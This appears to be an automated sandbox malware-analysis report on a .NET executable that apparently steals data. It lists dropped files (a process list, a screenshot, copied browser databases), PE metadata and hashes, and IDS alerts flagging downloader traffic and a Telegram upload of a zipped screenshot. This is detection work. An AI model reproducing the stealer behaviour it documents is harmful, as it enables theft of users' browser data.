SHA-512:	8C677FF4B66C38F841594D3B8C5F4A9D1BD02E1E59C0E91EFB4BB05C5A8F9F21BDFB93CC3A73439CF9558E367DD9C157348C391904DAED57DCE9CCB17F3CE352
Malicious:	false
Preview:	Google Chrome..Microsoft Edge..Microsoft Edge Update..Microsoft Edge WebView2 Runtime..Java Auto Updater..Java 8 Update 381..Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532..Office 16 Click-to-Run Extensibility Component..

C:\Users\user\AppData\Local\138727\Process.txt

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	18361
Entropy (8bit):	5.591646660883316
Encrypted:	false
SSDEEP:	96:xJsksMssEs6tNEssH7sssswGHsoB/HsHoqfswJHrMisssrMi3ceHHrMtss2Mpnwp:ItCi7MtMkMIM4MOlM1Q
MD5:	DDC8CE3B62B0F5C63E8504E3D5EDC8B9
SHA1:	EB1BE939D00C984CDBE5F99CBDC268450FDD65E4
SHA-256:	34A38E487CB22C92FB858F97792584100F5982B972E70EB2B87FB173ED28A66E
SHA-512:	EB1A3B4E2B306A605DB903259AB89D8D6182EC664C4A214EA9D8CC2B72C4B7DC0203BD08B221FBAA889A15EEAF6DA3B4807119F5EFBAD5EC4B35F0BE7AE1CD2C
Malicious:	false
Preview:	NAME: WmiPrvSE.EXE: C:\Windows\system32\wbem\wmiprvse.exe..NAME: svchost.EXE: ..NAME: wPnrDuJHXMufpDhHFkYRksqoQHYGis.EXE: C:\Program Files (x86)\oWbkjBmOVusoyApUHFtpnQyPCDFpxZAYShygdqxnFIusfqNRexqKWViWfsefURWkeenhEuZkkAjo\wPnrDuJHXMufpDhHFkYRksqoQHYGis.exe..NAME: fontdrvhost.EXE: C:\Windows\system32\fontdrvhost.exe..NAME: wPnrDuJHXMufpDhHFkYRksqoQHYGis.EXE: C:\Program Files (x86)\oWbkjBmOVusoyApUHFtpnQyPCDFpxZAYShygdqxnFIusfqNRexqKWViWfsefURWkeenhEuZkkAjo\wPnrDuJHXMufpDhHFkYRksqoQHYGis.exe..NAME: wPnrDuJHXMufpDhHFkYRksqoQHYGis.EXE: C:\Program Files (x86)\oWbkjBmOVusoyApUHFtpnQyPCDFpxZAYShygdqxnFIusfqNRexqKWViWfsefURWkeenhEuZkkAjo\wPnrDuJHXMufpDhHFkYRksqoQHYGis.exe..NAME: csrss.EXE: ..NAME: Memory Compression.EXE: ..NAME: svchost.EXE: C:\Windows\system32\svchost.exe..NAME: wPnrDuJHXMufpDhHFkYRksqoQHYGis.EXE: C:\Program Files (x86)\oWbkjBmOVusoyApUHFtpnQyPCDFpxZAYShygdqxnFIusfqNRexqKWViWfsefURWkeenhEuZkkAjo\wPnrDuJHXMufpDhHFkYRksqoQHYGis.exe..NAME: wPnrDuJHXMufpDhHFkYRksqoQHYGis.EXE: C:\

C:\Users\user\AppData\Local\138727\Screen.png

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	675242
Entropy (8bit):	7.924330852086713
Encrypted:	false
SSDEEP:	12288:CJbqiEwK2W6moRfuhwoDgadFTZrwNuswfYe/a8rbzaXNtXLUNYeXhMaOwa98:zim2mohJadVZ8u/zaXvomeRMJC
MD5:	942C3168F014E67DAAEFEA23999925E8
SHA1:	ABC1E9CC30D0B6E6A20C4D8ED94AA42223B5E505
SHA-256:	ACEBA21AA850DF25BD94F0CB35A66CE7135F0618FF305762F151E2BEF59A44AB
SHA-512:	F79CF94BAAAE9BBE9C616AF968C43CC4ADD0429958731AB82E835E8E9A19FB7E996F08E8DB555AED882E1658F82803AB02F94784FEC1AC9D8E5DA6272284E39D
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..y.mU.....qz.Fe.wk.;......._5Y..G.fU*}.. .GD....Q..(6.."6...$..I....{.^A.].\|.Z...=..].s..g.g.9...s.C...w....B5Y...}H.S.(..t.)...{...9)}.E.L.k..91........zd.....$Y.3...g.~...2....:w\._.../.b^L....../<.N.y\|$...O..{L:w.SG..Q..e.....k...4.#.......g.i..'..<</.>.....'J.....TA.......k........E....d.#"......90..{Z.>t..\|..s.....?..........t......i.b:`.S.<..-........w.d ..z....Cj..~{....'..Fk..5t....k-\|=mL.....zK..A....Nw..U.-7UK.zk.d.-..~...7.Gb>W....,Mu.5gt....9q...2>?.S\{.R~...%..xb..Y......h=...ml.o........j.M.f..e.;xn..........).....o..}........uM....<'..M...z...P.H5...X.c\F].wv.2.XO.s.{\.G.M..c,!.K...Z.W:.....)..U..nW.....P-.'...^.l...t.WV.]....n...~Efj...?na...J.......{^.Y.G...e$F~y.Y.....nW.Qk....9...3..\.....)..\|j.K3.;]...3.0...........o.Y5..y.l..}...^..=.....9.,.2..1..!.O.....R.6.T...Msb.......;..y.y=....V./.u....1....,r

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vEtDFkAZjO.exe.log

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1248
Entropy (8bit):	5.347863460191528
Encrypted:	false
SSDEEP:	24:ML9E4KXAE4KzecKDE4KhKiKhPKIE4oKNzKoR1qE4jE4K5sXE4qdKm:MxHKXAHKzecYHKh3oPtHo6Z1qHjHKMHA
MD5:	54A35BA0C52DAD92F72A95BF0D28B57C
SHA1:	952FB1B41527E6899AFA00BAA14ADAED5D94DA4C
SHA-256:	775EA2475D29721BAF6265B12E7B610D451E1A8E42A8B49BA2F73A693A848FF2
SHA-512:	DCCE2FA4E7BC913FD40132B87D3D29DDCD4A2659EC7F84220EAF44E73032D452CDD64508816F8EE4AB4A32A6B9391D536E07F938F4EAB2ACB5CFB33314E956EB
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, Publi

C:\Users\user\AppData\Local\Temp\places.raw

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03862698848467049
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxAserRNbekZ3DmVxL1HI:58r54w0VW3xWmfRFj381
MD5:	507BA3B63F5856A191688A30D7E2A93A
SHA1:	1B799649D965FF1562753A9EB9B04AC83E5D7C57
SHA-256:	10A34BE61CD43716879A320800A262D0397EA3A8596711BDAE3789B08CB38EF8
SHA-512:	7750584100A725964CAE3A95EC15116CDFE02DE94EFE545AA84933D6002C767F6D6AF9D339F257ED80BDAD233DBF3A1041AB98AB4BF8B6427B5958C66DCEB55F
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2FE9.tmp.dat

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1221538113908904
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5:	C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1:	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256:	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512:	01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp39BA.tmp.dat

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4BAA.tmp.dat

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp.dat

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03862698848467049
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxAserRNbekZ3DmVxL1HI:58r54w0VW3xWmfRFj381
MD5:	507BA3B63F5856A191688A30D7E2A93A
SHA1:	1B799649D965FF1562753A9EB9B04AC83E5D7C57
SHA-256:	10A34BE61CD43716879A320800A262D0397EA3A8596711BDAE3789B08CB38EF8
SHA-512:	7750584100A725964CAE3A95EC15116CDFE02DE94EFE545AA84933D6002C767F6D6AF9D339F257ED80BDAD233DBF3A1041AB98AB4BF8B6427B5958C66DCEB55F
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp84F4.tmp.dat

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1221538113908904
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5:	C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1:	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256:	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512:	01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8B2F.tmp.dat

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8D48.tmp.dat

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp921F.tmp.dat

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1371207751183456
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
MD5:	643AC1E34BE0FDE5FA0CD279E476DF3A
SHA1:	241B9EA323D640B82E8085803CBE3F61FEEA458F
SHA-256:	C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
SHA-512:	73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB083.tmp.dat

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB0A4.tmp.dat

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpEACC.tmp.dat

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1371207751183456
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
MD5:	643AC1E34BE0FDE5FA0CD279E476DF3A
SHA1:	241B9EA323D640B82E8085803CBE3F61FEEA458F
SHA-256:	C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
SHA-512:	73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.7947299173307725
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	vEtDFkAZjO.exe
File size:	327'680 bytes
MD5:	1b8dac31eb30bd909fadcd9738c832ca
SHA1:	3d5021b656dcb39863d39430a4eddb5d6eb0e177
SHA256:	80f34efce3765a4e57c2f333981112bff3788633bd515fa48b6eb16b88113660
SHA512:	25b02e6ae62add0a550b6c6cf3b1506177012ff94d885f0773fe5a7554d1fee1c96c3f286d6728eae31249eacbfc26d4869633145ba48ff3e6cef54ae8a9e54a
SSDEEP:	6144:3m/Q1Q5Ng68j/svmHC40+XIzFUygWK0tWrcBOvv:3m/Q6P8j/svm1TXI5tZB
TLSH:	E26439043BE98A18F1BF9BBAD4B15120C771B413A93EDB4F0A9510EA2D72391DD41FA7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.b.........."...0.................. ... ....@.. .......................`............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x45151e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x62B03EF4 [Mon Jun 20 09:33:40 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x514cc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52000	0x57e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x54000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x4f524	0x4f600	ff69d82aab1e22c3f06993a9a069bb2e	False	0.4030604084645669	data	5.808383580335681	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x52000	0x57e	0x600	078da39fc5e9aef738d16864348e002f	False	0.412109375	data	4.004369757380368	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x54000	0xc	0x200	7b6d00e1ed5f44d68f1c7a521df43254	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x520a0	0x2f4	data			0.43915343915343913
RT_MANIFEST	0x52394	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-31T15:02:25.265574+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49710	162.125.66.15	443	TCP
2024-12-31T15:02:25.348738+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49711	162.125.66.15	443	TCP
2024-12-31T15:02:26.535935+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49712	162.125.66.15	443	TCP
2024-12-31T15:02:26.676407+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49713	162.125.66.15	443	TCP
2024-12-31T15:02:27.856610+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49714	162.125.66.15	443	TCP
2024-12-31T15:02:28.650124+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49715	162.125.66.15	443	TCP
2024-12-31T15:02:30.716270+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49719	162.125.66.15	443	TCP
2024-12-31T15:02:31.963126+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49720	162.125.66.15	443	TCP
2024-12-31T15:02:33.195681+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49721	162.125.66.15	443	TCP
2024-12-31T15:02:34.967076+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49724	208.95.112.1	80	TCP
2024-12-31T15:02:37.391192+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.9	49727	149.154.167.220	443	TCP
2024-12-31T15:02:37.393078+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.9	49727	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 15:02:22.361438990 CET	49706	443	192.168.2.9	188.114.97.3
